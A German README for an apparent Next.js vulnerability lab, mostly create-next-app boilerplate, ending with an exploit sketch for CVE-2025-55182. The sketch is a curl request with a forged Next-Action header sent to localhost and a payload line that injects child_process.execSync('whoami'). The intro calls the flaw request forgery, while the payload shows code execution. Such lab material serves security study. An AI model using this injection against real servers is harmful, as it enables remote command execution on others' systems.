
Proof-of-Concept-Exploit für CVE-2025-55182, der eine Server-seitige Anfragenfälschung in Next.js über präparierte Multipart-Anfragen mit Manipulation des Next-Action-Headers ausnutzt.
Dies ist ein Next.js Projekt, das mit create-next-app erstellt wurde.
Starte zuerst den Entwicklungsserver:
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev
Öffne http://localhost:3000 mit deinem Browser, um das Ergebnis zu sehen.
Du kannst mit der Bearbeitung der Seite beginnen, indem du app/page.tsx änderst. Die Seite wird automatisch aktualisiert, während du die Datei bearbeitest.
Dieses Projekt verwendet next/font, um Geist, eine neue Schriftfamilie für Vercel, automatisch zu optimieren und zu laden.
Um mehr über Next.js zu erfahren, wirf einen Blick auf die folgenden Ressourcen:
Du kannst dir auch das Next.js GitHub Repository ansehen – dein Feedback und Beiträge sind willkommen!
Der einfachste Weg, deine Next.js App bereitzustellen, ist die Vercel Plattform von den Entwicklern von Next.js.
Weitere Details findest du in unserer Next.js Bereitstellungsdokumentation.
npx create-next-app@latest react-vuln-lab
npm install [email protected] [email protected] [email protected] --legacy-peer-deps
curl -v http://localhost:3000/ \
-H "Content-Type: multipart/form-data; boundary=boundary" \
-H "Next-Action: <YOUR_ACTION_ID_HERE>" \
--data-binary @payload.txt
- "_prefix": "require('child_process').execSync('whoami').toString()"